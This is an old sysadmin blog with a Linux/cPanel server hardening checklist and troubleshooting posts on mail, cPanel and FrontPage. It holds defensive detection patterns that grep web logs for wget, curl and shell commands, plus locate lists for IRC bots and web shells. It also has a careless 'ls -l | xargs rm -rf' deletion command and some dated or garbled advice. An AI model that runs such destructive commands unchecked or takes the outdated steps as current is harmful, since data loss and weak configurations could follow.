Monday, December 24, 2007

100 tweaks to secure your server to prevent HACK attempt

How to Secure your Linux Server:

1. Kernel recompile with GR security

2. firewall = CSF

3. Stop unnecessary processes

4. Install Logcheck

5. Install Logwatch

You can Optimize host.conf and sysctl.conf
http://www.eth0.us/node/104

To modify LogWatch, SSH into server and login as root

At command prompt type:

nano -w /etc/log.d/conf/logwatch.conf

You will see this entry:

MailTo = root

and change to

Mailto = your@email.com

Note: Set the e-mail address to an offsite account incase you get hacked.

Detail = Low

Change that to Medium, or High...

Detail = 5 or Detail = 10

Note: High will give you more detailed logs with all actions. Save and exit.

6. If cpanel server then WHM configuration check

7. OpenSSH configuration check

8. Switch from proftpd to pure-ftpd ( recommended pure-ftpd as it is more secure one)

9. Rootkit Hunter

rkhunter:

1. Login to your server via SSH as root. Then Type:

[root@server ~]cd /usr/local/src/

Download RKHunter Version 1.1.4

[root@server ~]wget http://downloads.rootkit.nl/rkhunter-1.1.4.tar.gz

Extract files

[root@server ~]tar -xzvf rkhunter-1.1.4.tar.gz

[root@server ~]cd rkhunter

[root@server ~]./installer.sh

2. Now setup RKHunter to e-mail you you daily scan reports:

[root@server ~]nano -w /etc/cron.daily/rkhunter.sh

Add The Following:

1. !/bin/bash

(/usr/local/bin/rkhunter -c --cronjob 2>&1 | mail -s "RKhunter Scan Details" replace-this@with-your-email.com)

Replace the e-mail above with your e-mail.

It is best to send the e-mail to an e-mail off-site so that

if the box IS compromised the hacker can't erase the scan report unless he hacks another server too

# chmod +x /etc/cron.daily/rkhunter.sh

10. Chkrootkit

Installing chkrootkit

[root@server ~]# wget >>ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
[root@server ~]# tar xvfz chkrootkit.tar.gz
[root@server ~]# ./chkrootkit*/chkrootkit

11. mod_security

12. mod_evasive

13. Host spoof protection

14. Operating System check

15. Name server configuration check

16. Disk check

17. Kernel check

18. Apache tune and check

19. MySQL tune and check

20. Enhanced log rotation

21. Day of the week backup rotations

22. Secure /tmp /var/tmp /dev/shm

23. Libsafe for 2.4 kernels

24. Exploit check

25. Delete unnecessary OS users

26. Disable open DNS recursion

27. Enhanced path protection

28. Remove SUID/GUID from binaries

29. PHP hardening

30. phpsuexec

31. Disable vulnerable phpBB installs

32. Initial cPanel configuration

33. Check iptables is configured

34. Check incoming MySQL port

35. Check /etc/cron.daily/logrotate

36. Check /etc/resolv.conf for localhost entry

37. Check /etc/named.conf for recursion restrictions

38. Check server runlevel

39. Check nobody cron

40. Check Operating System support

41. Check SSHv1 is disabled

42. Check SSH on non-standard port

43. Check SSH PasswordAuthentication

44. Check telnet port 23 is not in use

45. Check shell limits

46. Check Background Process Killer

47. Check root forwarder

48. Check exim for extended logging

49. Check php for enable_dl = enable_dl = Off

50. Check php for disable_functions=

disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open, allow_url_fopen


51. Check php for register_globals register_globals = Off

52. Check php open_basedir protection

53. Check phpsuexec

54. Check cPanel login is SSL only

55. Check boxtrapper is disabled

56. Check max emails per hour is set

57. Check whether users can reset passwords via email

58. Check whether native cPanel SSL is enabled

59. Check compilers

60. Check Anonymous FTP access

61. Check allow remote domains

62. Check block common domains

63. Check allow park domains

64. Check package updates

65. Check security updates

66. Check melange chat server

67. service cups stop; chkconfig cups off

68. service xfs stop; chkconfig xfs off

69. service atd stop; chkconfig atd off

70. service nfslock stop; chkconfig nfslock off

71. service canna stop; chkconfig canna off

72. service FreeWnn stop; chkconfig FreeWnn off

73. service cups-config-daemon stop; chkconfig cups-config-daemon off

74. service iiim stop; chkconfig iiim off

75. service mDNSResponder stop; chkconfig mDNSResponder off

76. service nifd stop; chkconfig nifd off

77. service rpcidmapd stop; chkconfig rpcidmapd off

78. service bluetooth stop; chkconfig bluetooth off

79. service anacron stop; chkconfig anacron off

80. service gpm stop; chkconfig gpm off

81. service saslauthd stop; chkconfig saslauthd off

82. service avahi-daemon stop; chkconfig avahi-daemon off

83. service avahi-dnsconfd stop; chkconfig avahi-dnsconfd off

84. service hidd stop; chkconfig hidd off

85. service pcscd stop; chkconfig pcscd off

86. service sbadm stop; chkconfig sbadm off

87. service webmin stop; chkconfig webmin off

88. Add Load Alert Scripts with 1 min cron

#!/bin/bash
#uptime alerti script ..
UP=`uptime|awk '{print $(NF-2)}'|cut -d. -f1`
if test $UP -gt 4
then
`uptime| mail -s "**SERVER LOAD is $UP" mailadd@mail.com`
fi

89. ignore ping :

1.[root@server ~] iptables -A INPUT -p icmp -j DROP

[root@server ~] echo 1>/proc/sys/net/ipv4/icmp_echo_ignore_all

[root@server ~] vi /etc/sysctl.conf

Append following line:

net.ipv4.icmp_echo_ignore_all = 1

90. Find directory with 777 permission.

[root@server ~] find . -type d -perm 777

91.Check for open ports using nmap command.

92. Disable identification output for Apache

To disable the version output for proftp, SSH into server and login as root.

At command prompt type: pico /etc/httpd/conf/httpd.conf

Scroll (way) down and change the following line to

ServerSignature Off

Restart Apache

At command prompt type:

[root@server ~] /etc/rc.d/init.d/httpd restart

93.Change ssh ListenAddress /etc/ssh/sshd_config

94.PermitRootLogin no

95.Add root login alert

vi .bash_profile

echo 'ALERT - Root Shell Access on:' `date` `who`
| mail -s "Alert: Root Access from `who | awk '{print $6}'`" your@email.com

96.Set an SSH Legal Message in /etc/motd

97.Locate.

locate shell.php
locate irc
locate eggdrop
locate bnc
locate BNC
locate ptlink
locate BitchX
locate guardservices
locate psyBNC
locate .rhosts

98.Perform some udp and tcp scan here :

http://www.hackerwatch.org/probe

Also to check if Your Internet connection has no Reverse DNS, this one is also a good URL to check out:

https://www.grc.com/x/ne.dll?bh0bkyd2


99.Check log files at

[root@server ~] tail -f /var/log/secure
[root@server ~] tail -f /var/log/messages
[root@server ~] tail -f /var/log/lastlog ( to check last log)
[root@server ~] tail -f /var/log/security ( logs related to kernel and ICMP/ TCP)

and other log files ( depending on your OS distro) of services running to see if there are any issues.

vmstat

Displays information about memory, cpu and disk.
Ex: bash# vmstat 1 4 (where 1 is delay and 4 is count)

mpstat

Displays statistics about cpu utilization. This will help us to see if your cpu is over worked or not.
Ex: bash# mpstat 1 4 (where 1 is delay and 4 is count)

iostat

This command displays statistics about the disk system.
Useful options:
-d - Gives the device utilization report.
-k - Display statistics in kilobytes per second.
Ex: bash# iostat -dk 1 4 (where 1 is delay and 4 is count)

sar

Displays overall system performance.

Check to see if your server has any hidden processes running.

ps

Displays the status of all known processes.

lsof

100. Now List all open files. In Linux everything is considered a file, so you will be able to see almost all of the activity on your system with this command.

[root@server ~]chmod -R 700 /etc/rc.d/init.d/*
Use rpm -Va to find out if an rpm is modified
* Apply security patches to vulnerable software (ie. patch -p1 < patch file)
* Remove all unneeded ttys and console logins by removing the entry from /etc/securetty
* Check system logs (eg: /var/log/messages, /var/log/secure, etc.)
* Set a password on the boot loader (lilo and grub both support this)
* Monitor the system (nagios or big brother)

Install AIDE (Advanced Intrusion Detection Environment) is a free replacement for Tripwire.

http://www.cs.tut.fi/~rammer/aide.html

Testing phase when in production:

Use tools like nessus, nikto, and nmap to do a penetration test and see how well your server is secured.

Also do a stress test.

[root@server ~] find /usr/local/apache/domlogs -exec egrep -iH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)%20' {} \;

[root@server ~] find /usr/local/apache/domlogs -exec grep -iH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)%20' {} \;


Note: egrep works for For FreeBSD and for other distro's like CentOS use grep.

Wednesday, October 31, 2007

frontpage extensions didn't work on freebsd 6.2

freebsd + easyapache = no frontpage extensions:

Issue:After recompiling Apache on freebsd 6.2, the frontpage extensions didn't work

ReSolution:
frontpage module runs some tests on the
/usr/local/frontpage/version5.0/apache-fp/_vti_bin/fpexe file and if any of them fail then it doesn't include itself in the apache build. The test it was failing on was to see if it could write protect that file.

Here is the possible Fix :

# vi /var/cpanel/perl/easy/Cpanel/Easy/Apache/Frontpage.pm

and replace the following line

return $self->run_system_cmd_returnable( [qw(chattr -i /usr/local/frontpage/version5.0/apache-fp/_vti_bin/fpexe)] );

with this one

return $self->run_system_cmd_returnable( [qw(chflags noschg /usr/local/frontpage/version5.0/apache-fp/_vti_bin/fpexe)] );

And replace this

return $self->run_system_cmd_returnable( [qw(chattr +i /usr/local/frontpage/version5.0/apache-fp/_vti_bin/fpexe)] );

with this one

return $self->run_system_cmd_returnable( [qw(chflags schg /usr/local/frontpage/version5.0/apache-fp/_vti_bin/fpexe)] );

save and exit the file.

Also write protect the file with

# chflags schg /var/cpanel/perl/easy/Cpanel/Easy/Apache/Frontpage.pm

# /scripts/easyapache --force


Note: chflags command runs on freebsd environment instead of the chattr command in Linux environment.

Sunday, October 7, 2007

Error while creating mbox spool file

Issue: "error while creating mbox spool file"
If exim and spamd both fails constantly on cpanel server:

Resolution:

check the exim panic logs at

# tail -f /var/log/exim_paniclog

Also try out the following scripts :

# /scripts/eximup --force
# /scripts/perlinstaller --force Mail::SpamAssassin
# /scripts/autorepair spamd_dbm_fix
# /scripts/fixspamassassinfailedupdate


Also check the available disk space and available inodes on the partition holding /var

# df -h
# df -hi


If you are receiving the errors like

2007-09-12 12:50:00 1IVPnE-00085R-86 failed to open scan directory /var/spool/exim/scan/scan/1IVPnE-00085R-86: Too many links
2007-09-12 12:50:00 1IVPnE-00085R-86 spam acl condition: error while creating mbox spool file
2007-09-12 12:50:00 1IVPnE-00085R-86 failed to open scan directory /var/spool/exim/scan/scan/1IVPnE-00085R-86: Too many links

2007-10-06 17:01:41 1IeHiN-0005Nf-UI failed to open scan directory /var/spool/exim/scan/scan/1IeHiN-0005Nf-UI: Too many links
2007-10-06 17:01:41 1IeHiN-0005Nf-UI malware acl condition: error while creating mbox spool file
2007-10-06 17:01:41 1IeHiN-0005Nf-UI H=(<5) [] F=<> temporarily rejected after DATA
2007-10-06 17:01:41 1IeHiN-0005Ng-UO failed to open scan directory /var/spool/exim/scan/scan/1IeHiN-0005Ng-UO: Too many links


# cd /var/spool/exim/scan

# ls -alt | wc


If you've got a real high number (like 32000) then that might be a problem - for a few reasons -
(1) filesystem may only support x # of directories,
(2) something else going wrong causing too many directories to remain there even after processing.


The possible fix for this issue:

Following error occurred due to scan directory crossed the size limit

2007-10-06 05:05:50 1Ie6Xe-00042f-9B failed to open scan directory /var/spool/exim/scan/scan/1Ie6Xe-00042f-9B: Too many links
2007-10-06 05:05:50 1Ie6Xe-00042t-5y failed to open scan directory /var/spool/exim/scan/scan/1Ie6Xe-00042t-5y: Too many links


Solution:

Empty the folder /var/spool/exim/scan You can empty the large folder using following command.

# ls -l | xargs rm -rf

Friday, September 28, 2007

Blank screen after login for cpanel

Issue: Blank screen after login for cpanel

whm works fine and we can make accounts. But when we go into list accounts and click on the cpanel icon for a user. it goes to the login screen for the frontend but then after the password is put in it just loads a blank screen. the permissions for the folders are fine.


Resolution:

WHM > Tweak Settings > System section > remove the check beside:

Disable login with root or reseller password into the users' cPanel interface. Also disable switch account dropdown in themes with switch account feature.



...http://myip:2082

You will get the login for cpanelX. and you put in the correct login details and it logs into an empty screen.

If this is a new server, make sure you choose a theme under

Server Configuration << Basic cPanel/WHM Setup << Default cPanel Theme

* Enter the default cPanel theme for newly created accounts whose package does not specify a theme.

If that fails,

try running from root in ssh

# /scripts/portsup

then run

# /usr/local/cpanel/bin/checkperlmodules

after that finishes, run

# /scripts/upcp --force



check the log file at

# /usr/local/cpanel/logs/error_log


# /scripts/portsup


# portupgrade compat4x-i386-5.X (Assuming you are running FreeBSD i386 v5.3 or v5.4)


# /usr/local/cpanel/bin/checkperlmodules


# /scripts/upcp --force


In addition, login to the WHM >> Tweak Settings >> System section >> un-check the following: Disable login with root or reseller password into the users' cPanel interface. Also disable switch account dropdown in themes with switch account feature

You'll need to increase RLIMIT_RSS for cPanel to function properly. The following error is being generated:

The rlimit 'RLIMIT_RSS' is set below the maximum sane threshold for cPanel to function. Currently it is set at [soft:78643200 hard:78643200].
Please increase it to at least 134217728.

Installing roundcube webmail on Directadmin server

How to install roundcube on Linux server with Directadmin installed:

Following is the roundcube install script and It's being released as beta version.

To install it: code is

# cd /usr/local/directadmin/scripts

# wget -O roundcube.sh http://files.directadmin.com/services/all/roundcube.sh

# chmod 755 roundcube.sh

# ./roundcube.sh

# chmod 755 roundcube.sh


Once installed, you'll need to restart apache for the /roundcube alias to function. Roundcube uses mysql for it's data, so a da_roundcube database is created.


On CentOS 4.4 + and Debian 3.1 + the above script will work smoothly but If you have freebsd os on your server then,

/bin/mv --force [files]

you need to change it to

/bin/mv -f [files]

or it will error saying

mv: illegal option -- -

If you had no da_admin or root password set for mysql so if you get permission errors about mysql, try running the following

# /usr/local/bin/mysqladmin -u root password 'new password'

# /usr/local/directadmin/scripts/mysql.sh 'root mysql password' da_admin 'da_admin password you want'


If you want to see errors - edit /var/www/html/roundcube/config/main.inc.php and set debug level to 4.


RoundCube webmail is a web-based mail client like squirrelmail or uebimiau is. More info about RoundCube webmail: http://www.roundcube.net


Issue: If IMAP not working. Can't connect to 143

Following are the quick fixes:

1) Make sure /usr/sbin/imapd exists and is executeable. You should be able to run it and see:

[root@user sbin]# /usr/sbin/imapd
* OK [CAPABILITY IMAP4REV1 LOGIN-REFERRALS STARTTLS AUTH=LOGIN]
server.hostname.com IMAP4rev1 2003.339 at Thu, 23 Sept 2007 12:34:14 -0600 (MDT)

2) make sure xinetd is running (inetd on FreeBSD)

[root@user sbin]# ps -ax | grep inetd | grep -v grep

On newer redhat/fedora/centos machines, you can install it with:

# yum -y install xinetd

# /sbin/service xinetd start

# /sbin/chkconfig xinetd on


3) Make sure xinetd has the proper settings:
RedHat: /etc/xinetd.d/imap

# default: on
# description: imapd
service imap
{
disable = no
socket_type = stream
wait = no
user = root
server = /usr/sbin/imapd
log_on_success += DURATION USERID
log_on_failure += USERID
nice = 10
}


FreeBSD: /etc/inetd.conf

imap4 stream tcp nowait root /usr/sbin/imapd imapd

ote that the /etc/inetd.conf will contain many other lines. Just make sure that this one exists somewhere.

To test it out, run:

[root@user]# telnet localhost 143
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
* OK [CAPABILITY IMAP4REV1 LOGIN-REFERRALS STARTTLS AUTH=LOGIN]
localhost IMAP4rev1 2003.339 at Thu, 23 Sept 2007 12:39:55 -0600 (MDT)

4) You can also double check that the imapd binary is the one we included by running:

# rm -f /usr/sbin/imapd

# cd /usr/local/directadmin/scripts

# ./imapd.sh


5) check your /etc/hosts file. Make sure you have one line that contains

127.0.0.1 localhost.localdomain localhost

6) If you can connect via localhost and not from outside the server, check your firewall settings to make sure port 143 is open.

# netstat --listen
# lsof -i

And if nmap is installed on server then you can check by using command

# nmap localhost

If you can see the port 443 opened in the listing that means port is still opened on the server .

Issue with the libdb libraries and trouble with email

Issue with the libdb libraries and trouble with email

When having trouble with email and the following error in the exim_paniclog on a cpanel server:

User 0 set for local_delivery transport is on the never_users list

The issue appears to be with some of the libraries the following commands should fix it:

# ln -s libdb2.so.3 libdb.so.3

# /scripts/eximup --force

# /etc/rc.d/init.d/exim start
# /etc/rc.d/init.d/exim stop

Friday, September 21, 2007

Running your own CGI scripts

Running your own CGI scripts:

Issue: If you want to enable a directory and its subdirectories for CGI, create the following .htaccess file and add the following lines

Options ExecCGI

addType application/x-httpd-cgi .cgi .pl


These contents may be combined with other configuration features such as restricted access to a part of your Web site. If the system administrator really do not want you to run CGI scripts she or he can disable the use of .htaccess files for all users. .htaccess file must be set to be readable by everybody.

You can change the ownerhsip and permissions for the .htaccess file as follows:

# chmod 644 .htaccess

# chown user:user .htaccess


1) place your script in the same folder where .htaccess file is.

2) Make sure that the scipt has extension .cgi or .pl. The latter is commonly used for programs written in PERL - a popular language for writing CGI scripts.

In case you wrote your script in C or C++ you must compile it using a compiler for the particular operating system. For example a program compiled on Windows will not run directly on Unix or Linux. You have to compile the source code using a complier for Unix, Linux, or other operating system accordingly.

After the program is transfered to the Web server it needs to be marked as executable. Typically files are marked and read-write only by default and cannot be run as programs.

You can do it by typing in console window the following command:

# chmod a+rx program.pl ( where program.pl is the name of your program.)

You can test a sample script in PERL and look at its see its source code. If you want to copy the script to your Web site you need to modify content of the very first line so that it points to the location of PERL on your Web server.

There are some security issues in case your program needs to write to a file - you need to set permission for other people (such as Web server daemon) to allow modification of that file or files in your directory. Use chmod command to enable proper access to some of your files.